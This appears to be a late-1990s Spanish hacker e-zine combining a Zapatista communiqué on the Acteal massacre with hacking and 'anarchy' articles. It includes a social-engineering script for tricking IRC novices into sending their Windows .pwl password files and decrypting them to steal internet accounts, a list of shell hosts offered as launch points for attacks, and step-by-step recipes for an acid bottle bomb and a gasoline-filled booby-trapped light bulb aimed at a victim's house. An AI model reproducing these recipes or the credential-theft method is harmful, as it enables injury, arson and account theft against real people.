A los pueblos y gobiernos del mundo;
A la prensa nacional e internacional;

Hermanos:

En relacion con la matanza de indigenas en la comunidad Acteal, municipio de
San Pedro de Chenalho, Chiapas, realizada el dia de ayer, 22 de diciembre de
1997, el EZLN se¤ala:

Primero. De acuerdo a la informacion recabada hasta ahora, unos 60
paramilitares del Partido Revolucionario Institucional (patrocinados por los
gobiernos federal y estatal) fueron los que atacaron con armas de grueso
calibre a los indigenas desplazados que se encontraban refugiados en Acteal.

Segundo. Como resultado de la agresion que duro hasta 4 horas, fueron
asesinados cuando menos 45 indigenas, entre los que se cuentan 9 varones,
21 mujeres y 15 ni¤os (uno de ellos menor de un a¤o de edad). Ademas de los
muertos, quedaron heridos 7 hombres (4 son ni¤os) y 10 mujeres (4 de ellas
son ni¤as).

Tercero. De acuerdo a transmisiones radiales del Gobierno de Chiapas
(interceptadas por el EZLN), en las inmediaciones de Acteal y al tiempo que
se realizaba la masacre, policias de Seguridad Publica del estado de Chiapas
respaldaron la agresion y, en horas de la tarde y noche, se dedicaron a
recoger cadaveres para ocultar la magnitud de la matanza. Los se¤ores Homero
Tovilla Cristiani y Uriel Jarquin (Secretario y Subsecretario del Gobierno de
Chiapas respectivamente), comisionaron a la policia para respaldar este
crimen. El se¤or Julio Cesar Ruiz Ferro estuvo continuamente informado del
desarrollo del "operativo" (cuando menos desde las 12 horas del dia 22 de
diciembre, cuando la matanza llevaba ya una hora). Aprobado por los gobiernos
federal y estatal, el ataque se afino el dia 21 de diciembre en una reunion de
paramilitares (dirigida por el Se¤or Jacinto Arias, presidente municipal
priista) de las comunidades Los Chorros, Puebla, La Esperanza y Quextic, todas
estas del municipio de Chenalho.

Cuarto. La responsabilidad directa de estos hechos sangrientos recae en
Ernesto Zedillo Ponce de Leon y la Secretaria de Gobernacion, quienes desde
hace dos a¤os dieron luz verde al proyecto de contrainsurgencia presentado
por el Ejercito federal.

Dicho proyecto intenta desplazar la guerra zapatista hacia un conflicto entre
indigenas, motivado por diferencias religiosas, politicas o etnicas.

Para cumplirlo, se dedicaron a financiar equipo y armamento (mediante fondos
de la Secretaria de Desarrollo Social) y a dar entrenamiento militar (dirigido
por oficiales del Ejercito federal) a indigenas reclutados por el Partido
Revolucionario Institucional.

Para dar tiempo a que estos escuadrones de la muerte estuvieran listos, el
gobierno federal mexicano dise¤o una estrategia paralela de dialogo simulado,
consistente en llevar una negociacion sin intencion alguna de cumplir lo que
se acordara y aumentando la presencia militar en las zonas zapatistas.

El gobierno del Estado de Chiapas quedo encargado de garantizar la impunidad
de los grupos paramilitares y facilitar su operacion en las principales zonas
rebeldes: norte, selva y Altos de Chiapas.

Quinto. De esta manera unieron sus fuerzas los gobiernos federal y estatal,
el Partido Revolucionario Institucional y el Ejercito federal. Su objetivo
esta sintetizado por el "grito de guerra" de los paramilitares llamados
"mascara roja": "Vamos a acabar con la semilla zapatista", es decir, "vamos a
acabar con las comunidades indigenas"
.

Sexto. Como parte de su estilo de gobierno y muestra de su "voluntad de paz",
por diversos canales el se¤or Ernesto Zedillo mando amenazas a la Comandancia
General del EZLN con el siguiente mensaje: "Prefiero pasar a la historia como
represor antes que cumplir los acuerdos con el EZLN"
.

Esta palabra si la cumplio.

Zedillo ya paso a la historia como asesino de indigenas y lleva en las manos
la sangre de Acteal.

Septimo. La oportuna atencion de los medios de comunicacion a Chiapas y la
justa indignacion de la opinion publica nacional e internacional frente a lo
ocurrido, han provocado que los cerebros del crimen se arrebaten la palabra
para lavarse las manos y para prometer investigaciones "a fondo". No van a
castigar a los responsables, la impunidad esta garantizada porque los que
investigan el crimen son los mismos que lo planearon. Por esta razon, las
declaraciones del se¤or Zedillo y de sus subalternos no son mas que demagogia.

Octavo. Con motivo de la matanza de Acteal, el gobierno y sus voceros vuelven
a llamar al dialogo sin mencionar su determinacion de no cumplir lo ya
acordado y solo con el proposito de avanzar en su estrategia contrainsurgente.
En este sentido, llama la atencion la reciente y ridicula declaracion de la
Cocopa (que decidio irse de vacaciones en lugar de trabajar por la paz) sobre
los hechos de Acteal. Olvidan los legisladores que el que esta asesinando
ni¤os, mujeres y hombres es el gobierno, olvidan que el que esta haciendo uso
de las armas es el gobierno, olvidan que el que se niega a un dialogo serio es
el gobierno. Es a el al que deben dirigirse cuando hablen de no recurrir a la
violencia y de la necesidad de dialogar.

Noveno. Nuevamente el EZLN llama a la sociedad civil nacional e internacional
y a las organizaciones independientes para que no se dejen enga¤ar, y para que
exijan justicia verdadera y no simulaciones.

Decimo. El Comite Clandestino Revolucionario Indigena Comandancia General del
EZLN se encuentra en estos momentos completando la investigacion y analizando
lo ocurrido para tomar las decisiones necesarias pertinentes.

­Democracia!
­Libertad!
­Justicia!

Desde las Monta¤as del Sureste Mexicano.
Comite Clandestino Revolucionario
Indigena - Comandancia General
del Ejercito Zapatista de
Liberacion Nacional.
Mexico, Diciembre de 1997.

øùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùø
ùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøù


°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°
°±²Û Û²±°
°±²Û Como mandar mensajes gratis desde un movil digital Û²±°
°±²Û Û²±°
°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°

Por DreamWeaver

Como todos sabeis (o casi todos), los telefonos moviles digitales
tienen una opcion que consiste en mandar peque¤os mensajes escritos, esta
funcion cuesta en Espa¤a 25 pts/mensaje.

El mecanismo de estos mensajes es muy simple, editas un mensaje y
pones el numero de la persona a la que quieras mandarselo con una peque¤a
modificacion ( Si quieres mandar un mensaje al 907 546372, debes poner como
numero el +34 07 546372 , todo junto por supuesto) el mensaje llega a una
centralita espa¤ola, te cobra las 25 pts y lo manda al numero que pusiste
en el mensaje.

Despues de la explicacion pasemos a lo serio ......

En otros paises como son Italia o Sudafrica estos mensajes son
gratuitos... no creis que es una injusticia que nos cobren a los espa¤oles
5 duros por llamada???, pues esa injusticia esta solucionada, y de una forma
muy simple.. solo teneis que mandar vuestros mensajes a la centralita
sudafricana, estas centralitas remitiran vuestro mensaje al numero que
especificasteis igual que la centralita espa¤ola, con una peque¤a diferencia
economica, no os cobraran NADA.

¨Que? Ah si, se me olvidaba....
Pasos a seguir para cambiar de centralita:

1§ Encendeis el movil XD
2§ Entrais en las opciones del movil, seleccionais 'Mensajes', subopcion
'Estableciendo mensajes' y su subopcion 'Centro de servicio'
3§ Si no os habeis perdido en el paso anterior os aparecera el siguiente
numero: +3409090909 , borradlo y poner el de la centralita sudafricana.

*NOTA: Estos pasos son en el caso de tener un MoviStar, en el caso del
Airtel no deben cambiar mucho.

Conclusiones
Por supuesto, esto se podra aplicar a otras muchas funciones, dar
rienda suelta a vuestra imaginacion y si encontrais algo escribidme...

Centralita Sudafricana: +27831000002

DreamWeaver
e_mail: weaverdream@hotmail.com


øùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùø
ùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøù

=================================
| Free Unix Shell Accounts |
|Lista de servidores que ofrecen|
|acceso gratuito a un shell unix|
=================================
=VoraX=

¨Hace falta explicar la utilidad de una cuenta shell en un sistem unix?.
Creo que no por eso sin mas palabras mando la lista. No intenten hackear
estos sistemas, ¨para que? si ofrecen un servicio gratis y nos sirven mas
como punto de partida para otros hackeos que para hackearlos.
=Esta lista fue confeccionada originalmente por godson@usa.net existe otra de
exhaust@false.com, pero creo que es copiada de la primera =

= Las listas originales las pueden encontrar buscando en su maquina de
busqueda favorita "Free Unix Shell Accounts" o "Free shell accounts providers
list"


=Para obtener una cuenta generalmente deben enviar un mail, pueden hacerlo
desde la pagina de cada uno donde van a encontrar los datos que deben enviar=
y, se me escaparon algunas palabras :O....

---------------------------------------------------------------------------
ESTOS NO FUNCIONAN MAS:

flex.laker.net NO FUNCIONA MAS
Linuxbox NO HAY MAS CUENTAS GRATIS
Cyber Disaster NO FUNCIONA MAS
-----------------------------------------------------------------------------

(1) http://blackbox.thegeek.net/~blackbox/index.html
(2) http://www.unixnet.org "Unixnet.org"
(3) http://www.cyberspace.org "Grex"
(4) http://sdf.lonestar.org
(5) http://continuum.dynip.com
(6) http://dishboy.dyn.ml.org
(7) http://griffin.ni.net "Griffin"
(8) http://suburbia.com.au "Suburbia"
(9) http://www.wopr.net "Wopr Net"
(10) http://www.nyx.net "NYX Net"
(MAS DATOS DE CADA UNO ABAJO)

De estos no tengo datos porque los
saque de otros lugares:

http://pod.yeat.ml.org
http://free.x-tel.com
http://abyss.suid.net


===(1) [Este lo probe, anda bien]

Direccion de email:<username>@blackbox.thegeek.net
Pagina:http://blackbox.thegeek.net/~<username>
http://blackbox.thegeek.net/~blackbox/index.html
Email: root@blackbox.thegeek.net
Fee: -FREE- , donations encouraged
Payment Method: cash, check, money order, hardware donation
Possibility to order online: email validation
Initial HD space: 5MB (mmm.. en realidad son 3MB)
Additional HD space: Donation
Internet Connection: T1
Software/service available: ircii, tcl, gcc, ftp, screen, web page, telnet,
email account,etc.
OS: Redhat Linux 4.2
Computer: 486/33, 8MB RAM, 600MB HD
First appeared: 12-15-1997

==(2)
UNIXnet.org http://www.unixnet.org
Email: john@piglet.netlite.com (20/12/97)
Email: accounts@unixnet.org (2/9/97)
Fee: -FREE- .. donations requested.
Initial HD space: 5Mb (unregulated!)
Additional HD space: on request, case by case basis
Internet Connection: T1, 4 hops to backbone
Software/service: ircii, tcl, gcc, ncftp, webpage, email
OS: Linux Redhat 4.2
Comments: NO bots of any kind unless a donation is made,
NO screen. This host is former transient.
Last updated 12/20/97.

===(3)
Grex http://www.cyberspace.org
Email: info-g@cyberspace.org
Fee: Voluntary donation
Initial HD space: minimal
Internet Connection: a tiny 33.6 kbps modem link.
Software/service available: PicoSpan and Backtalk, lynx
OS: Sun OS 4.1.3
Comments: Grex is a public-access conferencing system, run by its users.
It's a tiny advertising-free space on the net where you
can find good conversations and a friendly user community.
(SI, todo muy lindo pero es mas lento que la mierda y tenes
que sacar numero para entrar (literalmente)

===(4)
http://sdf.lonestar.org
Email: accounts@sdf.lonestar.org
Initial HD space: 10-20 MB
Additional HD space: donation
Internet Connection: ISDN, 2 hops
Software/service available: everything you need, bots are welcome
to those who contribute.
OS: AT&T 3b2 UNIX System Vr3.2.3
Comments: no IRC !
First appeared: 07-09-1997
Last updated: 11-27-1997

====(5)
http://continuum.dynip.com
Email: support@continuum.dynip.com
Fee: -FREE-, donations encouraged ($5 to run an eggbot)
Payment Method: cash, check, money order
Possibility to order online: email validation
Initial HD space: 5MB
Additional HD space: $1 = +1mb
Internet Connection: 512kbps cable modem.
Software/service available: ircii, tcl, gcc, ncftp, screen, web page,
email account etc
OS: Slackware Linux 3.4 - Kernel 2.0.31
Computer: P75, 8MB ram, 1.2GB hd
First Appeared: 10-22-1997
Last Updated: 11-19-1997

===(6)
http://dishboy.dyn.ml.org
Email: jonp@radix.net
Fee: -FREE-
Possibility to order online: mail jonp@radix.net with desired l/p
Initial HD space: 5MB soft / 7MB hard limit
Additional HD space: Donating members only
Internet Connection: 14.4 Modem to radix.nets DS3 PoP in OxonHill,
MD, then to digex/cais
Software/service available: irc (EPIC4), gcc/cc, perl, ncftp, web page,
email account, majordomo (list server), pub ftp
OS: Linux Slackware 3.4, kernel release 2.0.32
Computer: 486DX4/80MHZ, 16megs RAM, 1.2 gig IDE HD
Comments: This system needs donations bad!!
Donating members have their Quotas removed and may run more
intensize processes i.e. bots/ircd's>
First appeared: 12-18-1997

==(7)
Griffin http://griffin.ni.net
Email: egb@griffin.ni.net
Fee: None. (Pending individual approval)
Possibility to order online: web page signup form.
Initial HD space: 5MB
Additional HD space: $1 - 1MB
Internet Connection:Cablemodem. 750kbps upstream, 10Mbps downstream.
Dialup: n/a
Software/service available: web, cgi, email, MUD, BitchX, Lynx etc
OS: Slackware Linux 2.0.30 ELF
Computer: Griffin (main): P60, 1GB HD, 24MB RAM. red5
(monitoring system): P120, 1GB HD, 8MB RAM.
Comments: Shell accounts are free, provided I think you're a nice person.
Only, dameons such as IRC bots, MUDs and Talkers, and exessive
disk usage are charged for.
Last Updated: 10-06-1997

==(8)
Suburbia http://suburbia.com.au
Email: info@suburbia.com.au
Fee: refer to http://www.suburbia.com.au/join
Payment Method: Visa, Mastercard, Bankcard, cheques, etc
Possibility to order online: yes
Initial HD space: 5MB
Additional HD space: unlimited-ish when a sponsor
Internet Connection: BRI (64k), 1 hops to backbone
Software/service available: ircII, gcc, ncftp, web page, email account, etc
OS: Linux
Comments: $10/month, unless you live in Sydney Australia, or good reason
given. NO IRCBOTS, NO IRCSERVERS.
First appeared: 07-28-1997
Last Updated: 12-18-1997

===(9)
wopr.net http://www.wopr.net
Email: support@wopr.net
Fee: -FREE- (donations accepted)
Initial HD space: 4MB
Additional HD space: NOT AVALABLE
Internet Connection: Dual B ISDN (128k)
Software/service available: ircii, tcl, gcc, perl, lots more
OS: NetBSD 1.2G
Computer: Sparcstation 10 with 320m ram 9.2G hd Supersparc Processor
First appeared: 12-12-1997
Last updated: 12-20-1997

===(10)
NYX.net http://www.nyx.net
Email(s): aburt@nyx.net
Fee: -FREE-
Initial HD space: 300Kb
Additional HD space: N/A
Internet Connection: T1
Software/service : web page, email account, tcl
OS: SunOS
Comments: You need to be validated to use the system.
<need comments from nyx users>
Last Updated: 08-26-1997

Envienme comentarios a mi de los servidores que probaron.
=VoraX= vrx@bigfoot.com

øùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùø
ùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøù

Como conseguir una cuenta con el glide y un poco de ingenieria social.

/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
Primero tenemos que localizar algun canal donde regalen cualquier fichero que
les pidamos, esto nomalmente lo encontraremos en canales del tipo :
#beginner
#iniciacion
#novatos
#ayuda_novatos etc..
En mi caso (Espa¤a) vamos a cualquier servidor del irc como minorisa, ergos,
ctv, arrakis, redestb o cualquier otro, una vez dentro en el caso de cual-
quiera de estos servidores encontraremos el canal #beginer (y algun otro que
indican la inexperiencia de los usuarios que alberga), entonces empezaremos
las relaciones de ingenieria social, algo como lo siguiente:

<Yo> Hola
<Novato> Hola
<Yo> Como va, dominas esto del irc??
<Novato> Si algo, quieres algo?
%%nota: Ahora es el momente para demostrar que somos verdaderamente novatos%%
<Yo> Sabes como pegar un texto el irc en el portapapeles??
<Yo> y si no es pedir mucho....como se escribe una letra en color??
%%%%%%%nota: No nos extra¤e que el novato no sepa la respuesta a ninguna de
las 2 preguntas :-)%%%%%

<Novato> Con solo seleccional el texto en la pantalla, ya queda automatica-
mente pegado en el portapapeles.
<Novato> Pero la segunda pregunta no tengo ni idea.
<Yo> Sabes enviar ficheros por aqui??
<Novato> Por supuesto
%%Nota: Si no sabe, para nuestro beneficio tendremos que ense¤arle :-)%%
<Yo> Es que tengo un problema de configuracion con el windows 95
<Yo> y creo que se trata de un fichero que se da¤o por un virus
<Novato> De que fichero se trata??
<Yo> De alguno *.pwl
<Novato> Espera
<Novato> Si ya lo he encontrado pero tiene mi nombre
<Yo> Si se trata del fichero donde el windows guarda la configuracion perso-
nalizada
<Novato> ah vale
<Yo> me lo puedes pasar?
<Novato> por supuesto

Ya esta!! tenemos el fichero, en ese fichero mucha gente cree que solo hay el
login y el passw de acceso a windows95 pero no es asi, tambien reside la in-
formacion del conocido MiConexion (del win95) con los datos para el acceso a
la cuenta en inet.
Como es normal, solo nos falta una cosa un desencriptador, y existen algunos,
aunque yo personalmente de momento solo he probado el glide, es un 33% eficaz
o sea que desencripta correctamente 1 de cada 3 ficheros, pero creo que vale
la pena.

Copiaremos el fichero *.pwl el el mismo directorio que el glide, entonces pro-
cedemos a la desencriptacion, como podremos comprobar, si escribimos glide,
nos indica que para obtener el correcto funcionamiento del desencriptador te-
nemos que seguir la siguiente estructura:

usage: glide filename (username)

Normalmente, segun mi experiencia, el username no tiene porque corresponder
con el nombre del fichero, ni tan solo lo debemos poner, asi que si el fichero
que nos a pasado el novato se llama barcelona.pwl, bastara con poner:
glide barcelona.pwl
entonces puede que nos encontremos algo del tipo:

Username: barcelona.pwl
Sizemask 1FA5
Analyzing block with size 0000 (0:1)
Analyzing block with size 0000 (1:0)
Analyzing block with size 0034 (2:3)

Esto nos lo encontramos en varias lineas hasta que vemos algo parecido a esto:

Recource [1] (2)
Recource [2] (54)
..............%%Aqui varios lineas parecidas%%
Recource [10] (54)
[Simbolos raros] *Rna\Mi Conexion\juan@server44567 [Simbolos raros]*Rna

Despues sigue alguna linea con recource pero ya esta, ya tenemos lo que anda-
bamos buscando ya podemos conectarnos con la cuenta del novatos poniendo lo
siguiente:

Nombre del usuario:juan@server
Contrase¤a:44567

Por ultimo, vamos a matizar un par o tres de tonterias (por si lo lee algun
novatillo), la primera y ya se ha dicho es que el glide funciona 1 de cada 3
casos (posiblemente solo funcione con las versiones antiguas del win95) por
ejemplo con el win95 osr2, no funciona.
Una segunda, en el glide aparece el nombre de usuario y contrase¤a del
"miconexion" del win95, por lo tanto, no le pidais el fichero a un usuario de
linux ;-DD.

La ultima aclaracion igual de tonta se trata de la DNS, en configuracion de
tcp/ip, en la dns que ponemos?? pues bien solo tenemos que ir a algun buscador
como altavista y poner el nombre del servidor en nuestro caso server, os puedo
asegurar que un 99% de veces sale, de forma que si sale un link a www.server
.com, solo tenemos que conectarnos a el y mirar la ip, o mas facil, con algun
portscan que tengamos por ahi.

Eso es todo, ahora se tiene otra conexion para inet, incluso cuando se tenga
varias cuentas, encontraremos algunas charlas donde podremos intercambiarlas.

Este texto ha sido escrito para la revista electronica RareGaZz, como medio
informativo, no me hago responsable del mal uso de dicha informacion, asi como
da¤os en los sistemas atacados por dicha cuenta ya que el texto ha sido dise-
¤ado unicamente con fines educativos y para prevenir dichos ataques.

Para cualquier consulta: tatiana76@hotmail.com

-TaTiAnA-
Vilanva City

øùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùø
ùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøù

ANARQUIA...MAS SOBRE EL ARTE DE HERIR COSAS VIVIENTES

//////////////////////////////////////////////////////////////////////////////

BOMBA DE ACIDO

Materiales:
-Una botella grande con tapon (si es de cristal ademas
se a¤ade metralla cuando explote :-D)
-Acido Clorhidrico (que se puede encontrar en cualquier
drogueria a un precio muy barato; en Espa¤a tambien se
le conoce con el nombre de Salfumant o Agua fuerte)
-Aluminio; se puede conseguir de las antenas viejas de
television (mas efectivo) o del papel ese plateado que
sirve para envolver los bocadillos.

Construccion:

Primero hay que averiguar la concentracion de Acido Clorhidrico, normalmente
es del 17%, si es muy alta se debe rebajar un poco con agua porque si no
actuara muy rapido y nos explotara en la cara.

Con el acido se llena un cuarto de la botella y rapidamente se introduce
el aluminio (hay que introducir una buena cantidad si esta en papel, una
buena forma es enrollandolo haciendo tiras y meterlo de golpe). una vez
dentro hay que tapar rapidamente la botella, lanzarla lo mas lejos posible
y a correr!!!

Dependiendo de la concentracion del acido este reaccionara mas pronto o mas
tarde, pero el acido de dentro se volvera negro y empezara a hervir y a
calentarse lanzando gases, si el tapon de la botella ejerce suficiente presion
la botella explotara desparramando el acido hirviendo en un radio de al menos
cinco metros.

No siempre sale una explosion expectacular, primero hay que experimentar
con las dosis de acido y aluminio.

NOTA: el gas que desprende la reaccion ademas de ser SUPER VENENOSO es
inflamable (supongo que es Hidrogeno) por lo que si de alguna manera se
consigue encenderlo la explosion gana mucho.

ATENCION: esta bomba ademas de ser potente puede producir quemaduras muy
graves en la piel y los ojos, asi que si algun incauto me hace caso y lo
prueba debe alejarse bastante del artefacto y en caso de no explotar esperar
un buen rato antes de acercarse.

Mr_Frost

//////////////////////////////////////////////////////////////////////////////

EL FOCO BOMBA

Ingredientes (o material) :
Un foco (de los normales y que sirva)
Una jeringa (De la que sea)
Azucar (Blanca de preferencia)
Gasolina (De la que sea)
Un traste de plastico o madera o metalico (Para revolver gasolina y azucar)
Una casa (La de la victima)

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ATENCION ATENCION ATENCION ATENCION ATENCION
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Nada mas una cosa, quien vaya a hacer esto tiene que star muy seguro de que lo
quiere hacer. Por que quien se va a imaginar que UN FOCO puede VOLAR UNA CASA?
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Instruxiones :
En el trastesillo, revuelves la gasolina con el azucar (Ai + o - [mas o
menos] que quede proporcional la gasolina con el azucar). La metes en la
jeringa. Cojes (el foco) y le haces un oyito con la jeringa en la rosca (si
puedes, si no con otra cosa) pero NO LA CAGUES!! haslo con CUIDADO, de modo
que al ponerlo de vuelta, no se vea el hoyo. Y le hechas la gasolina con
azucar (no me acuerdo que tanto, si alguien le cala poniendo el foco muy muy
lejos como si fuera a poner dinamita, me dice; no?). Y ya que haga todo eso,
naamas se espera a que la victima (lamer) se le ocurra prender la LUZ!!!! y
va a tener MUCHA LUMBRE!!!!
Trucha.

Ai nomas dando lata. /\/\r Z3/\/4/\/.

//////////////////////////////////////////////////////////////////////////////

[ Ninguno de estos procedimientos han sido seguidos por ningun miembro de
RareGaZz. Por favor no hagan estupideces. Avisen si lo hacen :-) ]

øùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùø
ùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøù

¨Existe la Anonimidad en Internet?

La razon principal de este texto es LLEVARTE AL PANICO TOTAL contandote sobre
toda la informacion privada que "derrochas" sin darte cuenta. Las lagrimas
caen de mis ojos cuando veo tantos inocentes y buenos internautas caer en
las garras de corruptos de todos tipos (como Micro$oft) que esconden
funciones secretas dentro de sus aplicaciones, o a traves de las maquinas de
busqueda que usas todo esto para meterte por la garganta un producto o
servicio cualquiera que eventualmente, terminas usando y muchas veces sin
necesitarlo. Pero esto termina cuando personas como nosotros nos ponemos
del lado de los simples e inocentes usuarios (y da¤amos a los corruptos).

No anonimidad en la red. Querido internauta, desafortunadamente toda la
informacion (y la informacion es poder) que estas derrochando por internet
esta siendo recolectada y usada para obtener un perfil exacto de tu
persona... esto esta pasando por todo el mundo... Cyber-o-Cracia, como muchos
lo llaman, se esta acercando... ellos nos rastrean cada vez que usamos
nuestras tarjetas de credito. Cada vez que compras en el supermercado con
las llamadas "tarjetas de descuento" (por que crees que nos las entregan
y nos piden que las usemos?), cada vez que haces una busqueda en el web,
visitas lugares en internet o simplemente mandas un mail a un grupo de
noticias o lista de correo.

Como he dicho, dejas huellas que pueden ser seguidas por cualquier Sherlock
y conseguir tu nombre... de ahi lo demas.

Ah! y tu preciosa informacion!
Los navegadores mas recientes pueden enviar los archivos de tu PC a la red
sin avisarte, archivos que pueden ser utiles a cualquier persona con la
intencion de venderte algo.

AUTOEXEC.BAT Este archivo contiene detalles de muchas cosas importantes
incluyendo la variable PATH que muestra donde estan tus herramientas.

SYSTEM.INI Contiene aun mas detalles de los lugares donde tu software esta
en tu disco, ademas cosas personales como preferencias, etc.

USER.DAT Este monstruo (que actualmente ocupa mas de 2 megas en mi PC)
contiene muchisima informacion a cerca de ti. Tu direccion de email, la
pagina que se ve cuando prendes tu navegador, tu ultima pagina visitada,
los archivos que bajaste de la red y de que tama¤o era, etc.

SYSTEM.DAT En este archivo se

  
encuentran aun mas detalles sobre tu vida
personal, incluyendo tambien los passwords de los salva pantallas, logins,
ultimos sitios telnet visitados, en fin, casi cualquier cosa que hayas
metido a un programa estara ahi. Todos los programas instalados o que alguna
vez instalaste estan registrados.

*.PWL Dentro de este archivo estan tus passwords que son facilmente desen-
criptados (si es necesario) en cualquier computadora.

nsform??.TMP Toda la informacion que metes en esas formas por internet la
localizas en estos archivos.

SECRING.PGP, Secring.SKR, .ASC, etc. Tu llavero donde esta tu llave secreta
y publica, la primera protegida por tu palabra clave (espero hayas escogido
una bastante segura:) PERO debes asegurarte que tu maquina no este ejecutando
ningun grabador de teclas o que algun virus este captando tus claves.

Como buscar cosas en la red anonimamente.
Todas las maquinas mantienen un record de tus busquedas y actividades. En
el web existen algunos lugares donde puedes obtener las cosas mas buscadas
en el web (la mayoria relacionadas con sexo) e incluso desde algunos sitios
puedes ver a personas haciendo busquedas en internet (esto es divertido).
La importancia de las maquinas de busqueda es muchisima (por eso surgen como
hierba mala) y es necesario saber como protegerte de sus mecanismos de
rastreo. Debes intentar usar una IP dinamica (asignada cada vez que usas
internet) y no una permanente. Tu nombre de host (hostname) y I.P. deben ser
lo mas "neutral" y si es posible, sin ninguna nacionalidad.

Trucos comunes para capturar personajes anonimos (como nosotros).
Un truco comun con el que han tratado de capturar nuestras I.P.'s y
procedencias aqui en RareGaZz es el de la "pagina falsa". Este truco consiste
en esto principalmente:

- Agarras un servidor y le instalas todos los scripts PERL conocidos para
rastrear e incluso applets que te envien toda la informacion del visitante
a una direccion de email o archivo.

- Pones cosas en la pagina que el objetivo necesite mucho.

- Escribe al objetivo promocionando la pagina.

El objetivo llega a la pagina y PRESTO! lo tienes. Como unicamente el
sabe la direccion de la pagina, sera el unico visitante esperado.

Moraleja: MANTEN TODA TU INFORMACION SENSITIVA EN EL WEB! DONDE A NADIE
SE LE OCURRA ASOMARSE, DIGAMOS QUE TODOS LOS CRACKS QUE HAS HECHO ESTAN
DENTRO DE UN GIF DE TU PERRO EN UNA PAGINA CON TITULO "BARKIE Y YO". AHI
ESTARA MUCHO MAS SEGURA TU INFORMACION QUE DENTRO DE TU DISCO DURO.

øùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùø
ùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøùøù

==============================================================================
NAVEGANDO ANONIMAMENTE - SERVIDORES PROXIES
by =VoraX= 30/12/97
==============================================================================
I. ¨Que es un proxy server?
II. ¨Para que sirve un proxy?
III. ¨Como uso un proxy con mi navegador?
IV. ¨Que proxies puedo usar?

(I) ¨Que es un proxy server?

La traduccion de la palabra "proxy" es "apoderado" o "sustituto", es
decir una persona que toma la identidad de otra para determinada tarea.
Aplicado a la computacion y a Internet un proxy es un servidor que sirve
de intermediario entre un cliente y otro servidor.

CONEXION NORMAL SIN PROXY (A <-> B)

[RESPUESTA]
<CLIENTE> <------- <SERVIDOR>
(navegador,ftp) ========> (HTTP,FTP,etc)
(gopher,etc) [PEDIDO]


El cliente (A) que puede ser un navegador, un cliente ftp o de cualquier
otra clase se conecta con el puerto correspondiente del servidor (B).


CONEXION CON PROXY (A <-> C <-> B)

[RESPUESTA] ======= [RESPUESTA]
<CLIENTE> <------ | PROXY | <------- <SERVIDOR>
(navegador,ftp) =======> | SERVER| =======> (HTTP,FTP,etc)
(gopher,etc) [PEDIDO] ======= [PEDIDO]

En este caso el cliente (A) se conecta con un puerto especifico del
servidor proxy (C), y hace un pedido a otro servidor (B). El proxy C se
conecta con B y hace el pedido, luego de recibir la respuesta se la envia
al cliente original A.

CONEXION CON CACHE PROXY SERVER

[RESPUESTA] ======= [RESPUESTA]
<CLIENTE> <------ | PROXY | <------- <SERVIDOR>
(navegador,ftp) =======> | SERVER| =======> (HTTP,FTP,etc)
(gopher,etc) [PEDIDO] ======= [PEDIDO]
||
\/
[<CACHE>]
\-------/

Esta conexion es igual a la anterior con la diferencia de que el
servidor proxy tiene un cache (en disco) donde almacena las respuestas
a los pedidos de los clientes (A).

En una conexion normal cada programa cliente se comunica con el puerto
correspondiente en el servidor.Por ejemplo, cuando usamos un navegador,
este se contacta (generalmente) con el puerto 80 de la otra computadora.
Cuando bajamos una pagina el pedido se hace a ese puerto, y de alli se
reciben las respuestas. Cuando usamos el ftp pasa lo mismo pero con un
puerto distinto (23) aunque en realidad se usan otros para los datos, pero
no es tema de este texto.
En cambio, si usamos un proxy el programa cliente se conecta a un puerto
en una computadora donde funciona el "Proxy Server" y le hace un pedido de
otro servidor en otro puerto pero de un servicio especifico(http-ftp-etc)
Por eso existen distintos tipos de proxies de acuerdo al tipo de servicio
que soportan, lo que mas frecuentemente encontramos es: "HTTP proxy server"
y "FTP proxy server"

(II) ¨Para que sirve un proxy?

Los proxies tienen muchas utilidades, generalmente funcionan junto con
las firewalls, se usan de cache para acelerar la navegacion en LAN's o
hasta en ISP, pero el uso que nosotros le vamos a dar es el de ANONIMIZADOR
Como vimos antes, si nos conectamos a un servidor X mediante un proxy,
nosotros hacemos el pedido al proxy, el proxy lo hace al servidor X y nos
envia la respuesta a nosotros. Por lo tanto en X queda registrado que se
